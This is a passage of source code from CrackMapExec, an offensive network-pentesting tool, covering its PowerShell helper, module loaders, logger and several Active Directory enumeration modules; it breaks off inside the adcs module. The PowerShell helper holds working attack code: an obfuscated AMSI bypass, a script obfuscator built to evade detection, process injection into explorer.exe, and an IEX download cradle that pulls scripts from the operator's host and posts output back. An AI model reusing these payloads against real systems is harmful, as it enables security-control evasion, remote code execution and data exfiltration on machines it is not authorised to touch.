"a05b8cc2-17bc-4802-a710-e7c15ab866a2": "Certificate-AutoEnrollment",
"4125c71f-7fac-4ff0-bcb7-f09a41325286": "DS-Set-Owner",
"88a9933e-e5c8-4f2a-9dd7-2527416b8092": "DS-Bypass-Quota",
"084c93a2-620d-4879-a836-f0ae47de0e89": "DS-Read-Partition-Secrets",
"94825a8d-b171-4116-8146-1e34d8f54401": "DS-Write-Partition-Secrets",
"9b026da6-0d3c-465c-8bee-5199d7165cba": "DS-Validated-Write-Computer",
"ab721a54-1e2f-11d0-9819-00aa0040529b": "Send-As",
"ab721a56-1e2f-11d0-9819-00aa0040529b": "Receive-As",
"77b5b886-944a-11d1-aebd-0000f80367c1": "Personal-Information",
"e48d0154-bcf8-11d1-8702-00c04fb96050": "Public-Information",
"f3a64788-5306-11d1-a9c5-0000f80367c1": "Validated-SPN",
"68b1d179-0d15-4d4f-ab71-46152e79a7bc": "Allowed-To-Authenticate",
"ffa6f046-ca4b-4feb-b40d-04dfee722543": "MS-TS-GatewayAccess",
}
================================================
FILE: cme/helpers/powershell.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
from sys import exit
from string import ascii_lowercase
from random import choice, sample
from subprocess import call
from cme.helpers.misc import which
from cme.logger import cme_logger
from cme.paths import CME_PATH, DATA_PATH
from base64 import b64encode
obfuscate_ps_scripts = False
def get_ps_script(path):
return os.path.join(DATA_PATH, path)
def encode_ps_command(command):
return b64encode(command.encode("UTF-16LE")).decode()
def is_powershell_installed():
if which("powershell"):
return True
return False
def obfs_ps_script(path_to_script):
ps_script = path_to_script.split("/")[-1]
obfs_script_dir = os.path.join(CME_PATH, "obfuscated_scripts")
obfs_ps_script = os.path.join(obfs_script_dir, ps_script)
if is_powershell_installed() and obfuscate_ps_scripts:
if os.path.exists(obfs_ps_script):
cme_logger.display("Using cached obfuscated Powershell script")
with open(obfs_ps_script, "r") as script:
return script.read()
cme_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...")
invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'"
cme_logger.debug(invoke_obfs_command)
with open(os.devnull, "w") as devnull:
return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)
cme_logger.success("Script obfuscated successfully")
with open(obfs_ps_script, "r") as script:
return script.read()
else:
with open(get_ps_script(path_to_script), "r") as script:
"""
Strip block comments, line comments, empty lines, verbose statements,
and debug statements from a PowerShell source file.
"""
# strip block comments
stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read())
# strip blank lines, lines starting with #, and verbose/debug statements
stripped_code = "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))])
return stripped_code
def create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):
if custom_amsi:
with open(custom_amsi) as file_in:
lines = []
for line in file_in:
lines.append(line)
amsi_bypass = "".join(lines)
else:
amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
"""
if force_ps32:
command = (
amsi_bypass
+ """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(
command=amsi_bypass + ps_command
)
)
else:
command = amsi_bypass + ps_command
cme_logger.debug("Generated PS command:\n {}\n".format(command))
# We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed
# concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way
# of dealing with this it will use the partial python implementation that I stole from GreatSCT
# (https://github.com/GreatSCT/GreatSCT) <3
"""
if is_powershell_installed():
temp = tempfile.NamedTemporaryFile(prefix='cme_',
suffix='.ps1',
dir='/tmp')
temp.write(command)
temp.read()
encoding_types = [1,2,3,4,5,6]
while True:
encoding = random.choice(encoding_types)
invoke_obfs_command = 'powershell -C \'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command "ENCODING,{}" -Quiet\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),
temp.name,
encoding)
cme_logger.debug(invoke_obfs_command)
out = check_output(invoke_obfs_command, shell=True).split('\n')[4].strip()
command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(out)
cme_logger.debug('Command length: {}'.format(len(command)))
if len(command) <= 8192:
temp.close()
break
encoding_types.remove(encoding)
else:
"""
if not dont_obfs:
obfs_attempts = 0
while True:
command = f'powershell.exe -exec bypass -noni -nop -w 1 -C "{invoke_obfuscation(command)}"'
if len(command) <= 8191:
break
if obfs_attempts == 4:
cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1)
obfs_attempts += 1
else:
command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}"
if len(command) > 8191:
cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.")
exit(1)
return command
def gen_ps_inject(command, context=None, procname="explorer.exe", inject_once=False):
# The following code gives us some control over where and how Invoke-PSInject does its thang
# It prioritizes injecting into a process of the active console session
ps_code = """
$injected = $False
$inject_once = {inject_once}
$command = "{command}"
$owners = @{{}}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{
if ($_.getowner().domain -and $_.getowner().user){{
$owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle
}}
}}
try {{
if ($owners.ContainsKey($console_login)){{
Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
$injected = $True
$owners.Remove($console_login)
}}
}}
catch {{}}
if (($injected -eq $False) -or ($inject_once -eq $False)){{
foreach ($owner in $owners.Values) {{
try {{
Invoke-PSInject -ProcId $owner -PoshCode $command
}}
catch {{}}
}}
}}
""".format(
inject_once="$True" if inject_once else "$False",
command=encode_ps_command(command),
procname=procname,
)
if context:
return gen_ps_iex_cradle(context, "Invoke-PSInject.ps1", ps_code, post_back=False)
return ps_code
def gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):
if type(scripts) is str:
launcher = """
[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}')
{command}
""".format(
server=context.server,
port=context.server_port,
addr=context.localip,
ps_script_name=scripts,
command=command if post_back is False else "",
).strip()
elif type(scripts) is list:
launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'"
for script in scripts:
launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format(
server=context.server,
port=context.server_port,
addr=context.localip,
script=script,
)
launcher.strip()
launcher += command if post_back is False else ""
if post_back is True:
launcher += """
$cmd = {command}
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()""".format(
server=context.server,
port=context.server_port,
addr=context.localip,
command=command,
)
cme_logger.debug(f"Generated PS IEX Launcher:\n {launcher}\n")
return launcher.strip()
# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py
def invoke_obfuscation(script_string):
# Add letters a-z with random case to $RandomDelimiters.
alphabet = "".join(choice([i.upper(), i]) for i in ascii_lowercase)
# Create list of random delimiters called random_delimiters.
# Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
random_delimiters = [
"_",
"-",
",",
"{",
"}",
"~",
"!",
"@",
"%",
"&",
"<",
">",
";",
":",
]
for i in alphabet:
random_delimiters.append(i)
# Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]
# Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.
delimited_encoded_array = ""
for char in script_string:
delimited_encoded_array += str(ord(char)) + choice(random_delimiters)
# Remove trailing delimiter from $DelimitedEncodedArray.
delimited_encoded_array = delimited_encoded_array[:-1]
# Create printable version of $RandomDelimiters in random order to be used by final command.
test = sample(random_delimiters, len(random_delimiters))
random_delimiters_to_print = "".join(i for i in test)
# Generate random case versions for necessary operations.
for_each_object = choice(["ForEach", "ForEach-Object", "%"])
str_join = "".join(choice([i.upper(), i.lower()]) for i in "[String]::Join")
str_str = "".join(choice([i.upper(), i.lower()]) for i in "[String]")
join = "".join(choice([i.upper(), i.lower()]) for i in "-Join")
char_str = "".join(choice([i.upper(), i.lower()]) for i in "Char")
integer = "".join(choice([i.upper(), i.lower()]) for i in "Int")
for_each_object = "".join(choice([i.upper(), i.lower()]) for i in for_each_object)
# Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax
random_delimiters_to_print_for_dash_split = ""
for delim in random_delimiters:
# Random case 'split' string.
split = "".join(choice([i.upper(), i.lower()]) for i in "Split")
random_delimiters_to_print_for_dash_split += "-" + split + choice(["", " "]) + "'" + delim + "'" + choice(["", " "])
random_delimiters_to_print_for_dash_split = random_delimiters_to_print_for_dash_split.strip("\t\n\r")
# Randomly select between various conversion syntax options.
random_conversion_syntax = [
"[" + char_str + "]" + choice(["", " "]) + "[" + integer + "]" + choice(["", " "]) + "$_",
"[" + integer + "]" + choice(["", " "]) + "$_" + choice(["", " "]) + choice(["-as", "-As", "-aS", "-AS"]) + choice(["", " "]) + "[" + char_str + "]",
]
random_conversion_syntax = choice(random_conversion_syntax)
# Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.
encoded_array = ""
for char in script_string:
encoded_array += str(ord(char)) + choice(["", " "]) + "," + choice(["", " "])
# Remove trailing comma from encoded_array
encoded_array = "(" + choice(["", " "]) + encoded_array.rstrip().rstrip(",") + ")"
# Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).
# Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.
# If the OFS variable did exist then we could use even more syntax:
# $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls
# For more info:
# https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables
set_ofs_var_syntax = [
"Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "''",
choice(["Set-Variable", "SV", "SET"]) + choice([" " * 1, " " * 2]) + "'OFS'" + choice([" " * 1, " " * 2]) + "''",
]
set_ofs_var = choice(set_ofs_var_syntax)
set_ofs_var_back_syntax = [
"Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '",
"Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '",
]
set_ofs_var_back = choice(set_ofs_var_back_syntax)
# Randomize case of $SetOfsVar and $SetOfsVarBack.
set_ofs_var = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var)
set_ofs_var_back = "".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)
# Generate the code that will decrypt and execute the payload and randomly select one.
baseScriptArray = [
"[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array,
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
"(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
"(" + choice(["", " "]) + encoded_array + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")",
]
# Generate random JOIN syntax for all above options
new_script_array = [
choice(baseScriptArray) + choice(["", " "]) + join + choice(["", " "]) + "''",
join + choice(["", " "]) + choice(baseScriptArray),
str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(baseScriptArray) + choice(["", " "]) + ")",
'"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(baseScriptArray) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"',
]
# Randomly select one of the above commands.
newScript = choice(new_script_array)
# Generate random invoke operation syntax
# Below code block is a copy from Out-ObfuscatedStringCommand.ps1
# It is copied into this encoding function so that this will remain a standalone script without dependencies
invoke_expression_syntax = [choice(["IEX", "Invoke-Expression"])]
# Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.
# Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator,
# but not a silver bullet
# These methods draw on common environment variable values and PowerShell Automatic Variable
# values/methods/members/properties/etc.
invocationOperator = choice([".", "&"]) + choice(["", " "])
invoke_expression_syntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
invoke_expression_syntax.append(invocationOperator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')")
invoke_expression_syntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
invoke_expression_syntax.append(invocationOperator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')")
invoke_expression_syntax.append(invocationOperator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')")
invoke_expression_syntax.append(invocationOperator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')")
# Randomly choose from above invoke operation syntaxes.
invokeExpression = choice(invoke_expression_syntax)
# Randomize the case of selected invoke operation.
invokeExpression = "".join(choice([i.upper(), i.lower()]) for i in invokeExpression)
# Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
invokeOptions = [
choice(["", " "]) + invokeExpression + choice(["", " "]) + "(" + choice(["", " "]) + newScript + choice(["", " "]) + ")" + choice(["", " "]),
choice(["", " "]) + newScript + choice(["", " "]) + "|" + choice(["", " "]) + invokeExpression,
]
obfuscated_payload = choice(invokeOptions)
"""
# Array to store all selected PowerShell execution flags.
powerShellFlags = []
noProfile = '-nop'
nonInteractive = '-noni'
windowStyle = '-w'
# Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.
# This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.
commandlineOptions = []
commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])
commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])
# Randomly decide to write WindowStyle value with flag substring or integer value.
commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))
# Randomize the case of all command-line arguments.
for count, option in enumerate(commandlineOptions):
commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)
for count, option in enumerate(commandlineOptions):
commandlineOptions[count] = ''.join(option)
commandlineOptions = sample(commandlineOptions, len(commandlineOptions))
commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)
obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript
"""
return obfuscated_payload
================================================
FILE: cme/loaders/__init__.py
================================================
================================================
FILE: cme/loaders/moduleloader.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cme
import importlib
import traceback
import sys
from os import listdir
from os.path import dirname
from os.path import join as path_join
from cme.context import Context
from cme.logger import CMEAdapter
from cme.paths import CME_PATH
class ModuleLoader:
def __init__(self, args, db, logger):
self.args = args
self.db = db
self.logger = logger
def module_is_sane(self, module, module_path):
"""
Check if a module has the proper attributes
"""
module_error = False
if not hasattr(module, "name"):
self.logger.fail(f"{module_path} missing the name variable")
module_error = True
elif not hasattr(module, "description"):
self.logger.fail(f"{module_path} missing the description variable")
module_error = True
elif not hasattr(module, "supported_protocols"):
self.logger.fail(f"{module_path} missing the supported_protocols variable")
module_error = True
elif not hasattr(module, "opsec_safe"):
self.logger.fail(f"{module_path} missing the opsec_safe variable")
module_error = True
elif not hasattr(module, "multiple_hosts"):
self.logger.fail(f"{module_path} missing the multiple_hosts variable")
module_error = True
elif not hasattr(module, "options"):
self.logger.fail(f"{module_path} missing the options function")
module_error = True
elif not hasattr(module, "on_login") and not (module, "on_admin_login"):
self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)")
module_error = True
# elif not hasattr(module, 'chain_support'):
# self.logger.fail('{} missing the chain_support variable'.format(module_path))
# module_error = True
if module_error:
return False
return True
def load_module(self, module_path):
"""
Load a module, initializing it and checking that it has the proper attributes
"""
try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path)
module = spec.loader.load_module().CMEModule()
if self.module_is_sane(module, module_path):
return module
except Exception as e:
self.logger.fail(f"Failed loading module at {module_path}: {e}")
self.logger.debug(traceback.format_exc())
return None
def init_module(self, module_path):
"""
Initialize a module for execution
"""
module = None
module = self.load_module(module_path)
if module:
self.logger.debug(f"Supported protocols: {module.supported_protocols}")
self.logger.debug(f"Protocol: {self.args.protocol}")
if self.args.protocol in module.supported_protocols:
try:
module_logger = CMEAdapter(extra={"module_name": module.name.upper()})
except Exception as e:
self.logger.fail(f"Error loading CMEAdaptor for module {module.name.upper()}: {e}")
context = Context(self.db, module_logger, self.args)
module_options = {}
for option in self.args.module_options:
key, value = option.split("=", 1)
module_options[str(key).upper()] = value
module.options(context, module_options)
return module
else:
self.logger.fail(f"Module {module.name.upper()} is not supported for protocol {self.args.protocol}")
sys.exit(1)
def get_module_info(self, module_path):
"""
Get the path, description, and options from a module
"""
try:
spec = importlib.util.spec_from_file_location("CMEModule", module_path)
module_spec = spec.loader.load_module().CMEModule
module = {
f"{module_spec.name.lower()}": {
"path": module_path,
"description": module_spec.description,
"options": module_spec.options.__doc__,
"supported_protocols": module_spec.supported_protocols,
"opsec_safe": module_spec.opsec_safe,
"multiple_hosts": module_spec.multiple_hosts,
}
}
if self.module_is_sane(module_spec, module_path):
return module
except Exception as e:
self.logger.fail(f"Failed loading module at {module_path}: {e}")
self.logger.debug(traceback.format_exc())
return None
def list_modules(self):
"""
List modules without initializing them
"""
modules = {}
modules_paths = [
path_join(dirname(cme.__file__), "modules"),
path_join(CME_PATH, "modules"),
]
for path in modules_paths:
for module in listdir(path):
if module[-3:] == ".py" and module != "example_module.py":
try:
module_path = path_join(path, module)
module_data = self.get_module_info(module_path)
modules.update(module_data)
except:
pass
return modules
================================================
FILE: cme/loaders/protocolloader.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from types import ModuleType
from importlib.machinery import SourceFileLoader
from os import listdir
from os.path import join as path_join
from os.path import dirname, exists, expanduser
import cme
class ProtocolLoader:
def __init__(self):
self.cme_path = expanduser("~/.cme")
def load_protocol(self, protocol_path):
loader = SourceFileLoader("protocol", protocol_path)
protocol = ModuleType(loader.name)
loader.exec_module(protocol)
return protocol
def get_protocols(self):
protocols = {}
protocol_paths = [
path_join(dirname(cme.__file__), "protocols"),
path_join(self.cme_path, "protocols"),
]
for path in protocol_paths:
for protocol in listdir(path):
if protocol[-3:] == ".py" and protocol[:-3] != "__init__":
protocol_path = path_join(path, protocol)
protocol_name = protocol[:-3]
protocols[protocol_name] = {"path": protocol_path}
db_file_path = path_join(path, protocol_name, "database.py")
db_nav_path = path_join(path, protocol_name, "db_navigator.py")
protocol_args_path = path_join(path, protocol_name, "proto_args.py")
if exists(db_file_path):
protocols[protocol_name]["dbpath"] = db_file_path
if exists(db_nav_path):
protocols[protocol_name]["nvpath"] = db_nav_path
if exists(protocol_args_path):
protocols[protocol_name]["argspath"] = protocol_args_path
return protocols
================================================
FILE: cme/logger.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from logging import LogRecord
from logging.handlers import RotatingFileHandler
import os.path
import sys
import re
from cme.helpers.misc import called_from_cmd_args
from cme.console import cme_console
from termcolor import colored
from datetime import datetime
from rich.text import Text
from rich.logging import RichHandler
class CMEAdapter(logging.LoggerAdapter):
def __init__(self, extra=None):
logging.basicConfig(
format="%(message)s",
datefmt="[%X]",
handlers=[
RichHandler(
console=cme_console,
rich_tracebacks=True,
tracebacks_show_locals=False,
)
],
)
self.logger = logging.getLogger("cme")
self.extra = extra
self.output_file = None
logging.getLogger("pypykatz").disabled = True
logging.getLogger("minidump").disabled = True
logging.getLogger("lsassy").disabled = True
#logging.getLogger("impacket").disabled = True
def format(self, msg, *args, **kwargs):
"""
Format msg for output if needed
This is used instead of process() since process() applies to _all_ messages, including debug calls
"""
if self.extra is None:
return f"{msg}", kwargs
if "module_name" in self.extra.keys():
if len(self.extra["module_name"]) > 8:
self.extra["module_name"] = self.extra["module_name"][:8] + "..."
# If the logger is being called when hooking the 'options' module function
if len(self.extra) == 1 and ("module_name" in self.extra.keys()):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}",
kwargs,
)
# If the logger is being called from CMEServer
if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()):
return (
f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}",
kwargs,
)
# If the logger is being called from a protocol
if "module_name" in self.extra.keys():
module_name = colored(self.extra["module_name"], "cyan", attrs=["bold"])
else:
module_name = colored(self.extra["protocol"], "blue", attrs=["bold"])
return (
f"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}",
kwargs,
)
def display(self, msg, *args, **kwargs):
"""
Display text to console, formatted for CME
"""
try:
if "protocol" in self.extra.keys() and not called_from_cmd_args():
return
except AttributeError:
pass
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs)
def success(self, msg, color='green', *args, **kwargs):
"""
Print some sort of success to the user
"""
try:
if "protocol" in self.extra.keys() and not called_from_cmd_args():
return
except AttributeError:
pass
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs)
def highlight(self, msg, *args, **kwargs):
"""
Prints a completely yellow highlighted message to the user
"""
try:
if "protocol" in self.extra.keys() and not called_from_cmd_args():
return
except AttributeError:
pass
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs)
def fail(self, msg, color='red', *args, **kwargs):
"""
Prints a failure (may or may not be an error) - e.g. login creds didn't work
"""
try:
if "protocol" in self.extra.keys() and not called_from_cmd_args():
return
except AttributeError:
pass
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
text = Text.from_ansi(msg)
cme_console.print(text, *args, **kwargs)
self.log_console_to_file(text, *args, **kwargs)
def log_console_to_file(self, text, *args, **kwargs):
"""
If debug or info logging is not enabled, we still want display/success/fail logged to the file specified,
so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers
"""
if self.logger.getEffectiveLevel() >= logging.INFO:
# will be 0 if it's just the console output, so only do this if we actually have file loggers
if len(self.logger.handlers):
try:
for handler in self.logger.handlers:
handler.handle(
LogRecord(
"cme",
20,
"",
kwargs,
msg=text,
args=args,
exc_info=None,
)
)
except Exception as e:
self.logger.fail(f"Issue while trying to custom print handler: {e}")
else:
self.logger.info(text)
def add_file_log(self, log_file=None):
file_formatter = TermEscapeCodeFormatter("%(asctime)s - %(levelname)s - %(message)s")
output_file = self.init_log_file() if log_file is None else log_file
file_creation = False
if not os.path.isfile(output_file):
open(output_file, "x")
file_creation = True
file_handler = RotatingFileHandler(output_file, maxBytes=100000)
with file_handler._open() as f:
if file_creation:
f.write("[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
else:
f.write("\n[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)))
file_handler.setFormatter(file_formatter)
self.logger.addHandler(file_handler)
self.logger.debug(f"Added file handler: {file_handler}")
@staticmethod
def init_log_file():
newpath = os.path.expanduser("~/.cme") + "/logs/" + datetime.now().strftime('%Y-%m-%d')
if not os.path.exists(newpath):
os.makedirs(newpath)
log_filename = os.path.join(
os.path.expanduser("~/.cme"),
"logs",
datetime.now().strftime('%Y-%m-%d'),
f"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log",
)
return log_filename
class TermEscapeCodeFormatter(logging.Formatter):
"""A class to strip the escape codes for logging to files"""
def __init__(self, fmt=None, datefmt=None, style="%", validate=True):
super().__init__(fmt, datefmt, style, validate)
def format(self, record):
escape_re = re.compile(r"\x1b\[[0-9;]*m")
record.msg = re.sub(escape_re, "", str(record.msg))
return super().format(record)
# initialize the logger for all of CME - this is imported everywhere
cme_logger = CMEAdapter()
================================================
FILE: cme/modules/IOXIDResolver.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/
# Airbus CERT
# module by @mpgn_x64
from ipaddress import ip_address
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter
class CMEModule:
name = "ioxidresolver"
description = "This module helps you to identify hosts that have additional active interfaces"
supported_protocols = ["smb", "wmi"]
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
""" """
def on_login(self, context, connection):
authLevel = RPC_C_AUTHN_LEVEL_NONE
stringBinding = r"ncacn_ip_tcp:%s" % connection.host
rpctransport = transport.DCERPCTransportFactory(stringBinding)
portmap = rpctransport.get_dce_rpc()
portmap.set_auth_level(authLevel)
portmap.connect()
objExporter = IObjectExporter(portmap)
bindings = objExporter.ServerAlive2()
context.log.debug("[*] Retrieving network interface of " + connection.host)
# NetworkAddr = bindings[0]['aNetworkAddr']
for binding in bindings:
NetworkAddr = binding["aNetworkAddr"]
try:
ip_address(NetworkAddr[:-1])
context.log.highlight("Address: " + NetworkAddr)
except Exception as e:
context.log.debug(e)
================================================
FILE: cme/modules/MachineAccountQuota.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class CMEModule:
"""
Module by Shutdown and Podalirius
Initial module:
https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota
Authors:
Shutdown: @_nwodtuhs
Podalirius: @podalirius_
"""
def options(self, context, module_options):
pass
name = "MAQ"
description = "Retrieves the MachineAccountQuota domain-level attribute"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = False
def on_login(self, context, connection):
result = []
context.log.display("Getting the MachineAccountQuota")
searchFilter = "(objectClass=*)"
attributes = ["ms-DS-MachineAccountQuota"]
result = connection.search(searchFilter, attributes)
context.log.highlight("MachineAccountQuota: %d" % result[0]["attributes"][0]["vals"][0])
================================================
FILE: cme/modules/adcs.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from impacket.ldap import ldap, ldapasn1
from impacket.ldap.ldap import LDAPSearchError
class CMEModule:
"""
Find PKI Enrollment Services in Active Directory and Certificate Templates Names.
Module by Tobias Neitzel (@qtc_de) and Sam Freeside (@snovvcrash)
"""
name = "adcs"
description = "Find PKI Enrollment Services in Active Directory and Certificate Templates Names"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.server = None
self.regex = None
def options(self, context, module_options):
"""
SERVER PKI Enrollment Server to enumerate templates for. Default is None, use CN name
BASE_DN The base domain name for the LDAP query
"""
self.context = context
